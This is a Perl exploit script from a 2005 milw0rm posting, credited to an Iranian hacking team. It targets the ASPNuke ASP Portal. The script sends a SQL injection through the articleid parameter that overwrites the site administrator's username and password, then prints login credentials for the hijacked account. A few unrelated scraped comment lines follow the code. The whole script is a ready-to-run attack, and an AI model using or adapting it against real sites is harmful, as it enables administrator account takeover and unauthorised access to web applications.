#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
######################################################################################
# EXPLOIT FOR: ASPNuke ASP Portal
#
# Expl0it By: [email protected]
#
# Discovered By: Trap-Set Underground Hacking Team (oil_KarchacK)
#
######################################################################################
# GR33tz T0 ==> Alpha_programmer -- oil_Karchack -- the_CephaleX -- Str0ke
# And Iranian Security & Technical Sites:
# IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team ,
# Crouz Security Team , Hat-squad security team & Simorgh-ev Security Team
######################################################################################
use IO::Socket;
if (@ARGV < 1)
{
print "n==========================================n";
print " n -- Exploit By mh_p0rtal --nn";
print " Trap-Set Underground Hacking Team nn";
print " Usage:ASPNuke.pl <T4rg3t> nn";
print "==========================================nn";
print "Examples:nn";
print " ASPNuke.pl www.Site.com n";
exit();
}
my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "[+]C0nn3ctedn";
$addr = "GET /module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c'%20,%20username='trapset'%20where%20userID=1%20-- HTTP/1.0n";
$addr .= "Host: $hostnnnn";
print "n";
print $remote $addr;
print "[+]Wait...";
sleep(5);
print "Wait For Changing Password ...n";
print "[+]OK , Now Login With : n";
print "Username: trapsetn";
print "Password: trapsetnn";
# milw0rm.com [2005-06-27]
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666